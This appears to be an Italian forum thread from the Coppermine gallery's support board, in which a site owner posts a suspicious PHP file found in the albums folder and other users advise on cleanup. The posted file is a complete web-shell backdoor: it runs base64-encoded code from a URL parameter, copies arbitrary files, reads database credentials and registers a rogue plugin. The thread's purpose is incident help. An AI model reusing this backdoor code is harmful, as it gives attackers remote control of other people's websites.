Possibile attacco alla gallery! Possibile attacco alla gallery!
 

News:

CPG Release 1.6.26
Correct PHP8.2 issues with user and language managers.
Additional fixes for PHP 8.2
Correct PHP8 error with SMF 2.0 bridge.
Correct IPTC supplimental category parsing.
Download and info HERE

Main Menu

Possibile attacco alla gallery!

Started by XTChrys, February 21, 2009, 06:15:39 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

XTChrys

Un saluto a tutta la community, scrivo questo post per avere chiarimenti su di un fatto che mi è accaduto poco tempo fa. Stavo caricando via ftp (uso Filezilla) alcune immagini, quando nella cartella "Album" trovo un file mai visto prima, con il nome "eca620cc3c082634e38a3ba890993fc0" che ho ovviamente rimosso dal server. Secondo voi mi devo preoccupare? Per ora non mi è successo nulla, ma temo in qualche attacco da parte di una hacker. Di seguito vi posto il codice php del file:

<?
$hash="eca620cc3c082634e38a3ba890993fc0";
if(isset($_GET["ch"])){
echo "oke";
echo "eff0";
}
if(isset($_GET["patch"])){
include("../include/config.inc.php");
mysql_connect($CONFIG["dbserver"], $CONFIG["dbuser"], $CONFIG["dbpass"]);
mysql_select_db($CONFIG["dbname"]);
//phpinfo();
$codebase_str='<?php
$hash
="eca620cc3c082634e38a3ba890993fc0";
if(
eregi("picEditor"$REQUEST_URI)||$_POST["save"]==1||isset($_POST["_REQUEST"])){
if(($_POST["hash"]!=$hash)){
die("");
}
}
?>
';

$codebase_str=str_replace("eca620cc3c082634e38a3ba890993fc0", $hash, $codebase_str);
$fp_codebase=fopen("userpics/codebase.php", "w");
fwrite($fp_codebase, $codebase_str);
$path=__FILE__;
preg_match("/(.*)(\/.*?)/", $path, $ok);
$path=$ok[0];
$mysql_path="/../../../../../../../../../../../../..".$path."userpics";
//echo $mysql_path."\n";
$sql="INSERT INTO `".$CONFIG['TABLE_PREFIX']."plugins` ( `plugin_id` , `name` , `path` , `priority` )
VALUES (
'', 'Sumple Plugin', '$mysql_path', '0'
);";
//echo $sql;
mysql_query($sql);
echo mysql_error();

if ($handle = opendir('.')) {
while (false !== ($file = readdir($handle))) {
if ($file != "." && $file != ".." && $file!="index.php" && !eregi($hash, $file)) {
if(is_file($file)){
unlink($file);
}
}
}
$fp=fopen("index.php", "w");
fclose($fp);
closedir($handle);
}
}
if(isset($_GET["eval"])){
eval(base64_decode($_GET["eval"]));
}
if(isset($_GET["up"])){
$fp=implode(file($_GET["up_name"]));
$fp_out=fopen($_GET["down_name"], "w");
fwrite($fp_out, $fp);
}
?>


Vi ringrazio in anticipo!

twist

Se la galleria e' stata infettata rimuovere il singolo file non serve.

L'unica cosa che ti puo' mettere al sicuro e' questa:
rinomina la root dove risiede coppermine, cosi' eviti altri eventuali danni e reinstalla da capo l'ultima versione.

Davide Renda

Anzitutto quale versione utilizzi? Alcune possibili falle di sicurezza sono state recentemente scoperte e "colmate", l'ultima versione è la 1.4.20

XTChrys

Vi ringrazio per avermi risposto. La gallery è aggiornata all'ultima versione 1.4.20. Quindi come mi dovrei comportare? Non c'è un altro modo senza dover cambiare la root della gallery?  ???

Davide Renda

Hai possibilità di leggere il log del tuo sito? Prima di gridare al lupo (o, meglio, all'hacker!) sarebbe interessante poter capire quale sia stata l'attività sul sito. Continuo a pensare al file che hai trovato, come ad un temporaneo, magari un trasferimento andato male o qualcosa del genere.
Se hai la possibilità di avere il log faccelo avere: se di hacking si tratta (o tentativo di hacking) è importante, per il bene di tutte le gallerie, capire cosa è successo e trovare soluzioni.

XTChrys

Il mio sito è hostato su Aruba, che sia un errore di trasferimento di Filezilla, non saprei. Per sicurezza ho aperto un ticket in assistenza chiedendo la modifica della password del mio database MySql e ho cancellato tutti i file della mia galleria (eccetto il config.inc.php e la cartella album) sostituendoli con quelli del pacchetto "Coppermine". Secondo voi ho fatto bene?

Per quanto riguarda invece la lettura del log non credo che Aruba lo permetta in quanto non sono riuscito a trovare questa funzione nel pannello di amministrazione.

Ludo

Quote from: XTChrys on February 21, 2009, 06:15:39 PMPer ora non mi è successo nulla, ma temo in qualche attacco da parte di una hacker.
Timori fondati, vedi qui un caso identico...e segui gli accorgimenti ivi suggeriti.
La falla è senz'altro precedente l'upgrade alla versione 1.4.20 (se hai avuto spirito da "hackerbuster" avrai senz'altro conservato il file, o preso nota della data 8) ), quindi IMHO con una disinstallazione e reinstallazione completa sei a posto. Raccomando anch'io di impostare i permessi della cartella /albums e relative a sottocartelle a 755 anzichè 777: Coppermine funziona ugualmente.

XTChrys

Grazie Ludo! Purtroppo è come temevo.  :-[  Siccome la mia gallery conta quasi 14.000 file e non vorrei perdere tutto il lavoro svolto, volevo sapere se una reinstallazione mi cancellerebbe tutto, oppure c'è un modo meno "aggressivo" per risolvere? Grazie per tutto il tempo che avete perso ad aiutarmi.  :)

Ludo

La reinstallazione, come l'installazione, non riguarda la cartella /albums (salvo pulizia), ma solo i core files (più eventuali plugin e mod aggiornati).
Per facilitare la pulizia della cartella albums, puoi lanciare uno scandir() ricorsivo che cerchi ed elimini i file con estensione diversa da quelli immagine e video...

XTChrys

io ho già eliminato tutti i file di coppermine eccetto la cartella album e config.inc.php con quelli "puliti" presenti nell'archivio del pacchetto di installazione. E' questo che intendevi dire? Scusami ma è la prima volta che mi accade una cosa del genere.
Lo scandir() come si esegue?

Ludo

Sì, intendevo esattamente quello, avendo l'accortezza di eliminare prima tutte le cartelle della vecchia installazione e poi ricaricarle interamente, così da rimuovere eventuali file ambigui.
Per scandir intendevo uno script in PHP che scorra le cartelle a partire da /albums e controlli la presenza di files non previsti, non essendo qui possibile eliminare la cartella.

XTChrys

Ok, grazie mille per l'aiuto, siete stati gentilissimi ora posso stare tranquillo.  :)

panu

Ciao a tutti!!
Scusate se mi intrometto ma , per mia imperdonabile negligenza non avendo aggiornato coppermine da circa un anno sono caduto in un sicuro attacco .... sono "sparite tutte le foto", nel senso che sono per fortuna ancora presenti nelle directory, che ho provveduto a salvare completamente, ma sono saltati tutti i link....
Nella cartella albums ho un file 03d667ca.php e uno 9.php ......
Cosa è successo?
Immagino non sia sufficente aggiornare coppermine ora..... mi rimane la cancellazione totale e reinstallazione o c'è un metodo piu indolore???
Se volete dare un'occhiata la gallery menomata la trovate su www.imbriaeghidozena.com/foto/index.php .....
Vi ringrazio anticipatamente ....

Ciao a tutti

panu

Ho risolto.... ora appena riesco procedo all'upgrade.... scusate il disturbo.....

Davide Renda

Quote from: panu on March 25, 2009, 12:22:19 AM
Ho risolto.... ora appena riesco procedo all'upgrade.... scusate il disturbo.....
Se spieghi come/cosa hai fatto, potrebbe essere d'aiuto anche ad altri è lo spirito del forum ;-)

panu

Si chiedo scusa....
non ho fatto nulla di che... dopo aver rimosso 1 file che mi era apparso nella cartella album ho semplicemente guardato che file fossero stati modificati il giorno dell'attacco e li ho ripresi da un backup di qualche tempo fa.... ora non sono a casa, quando apro il mio pc scrivo i nomi dei file che erano stati attaccati...

Ciao a tutti..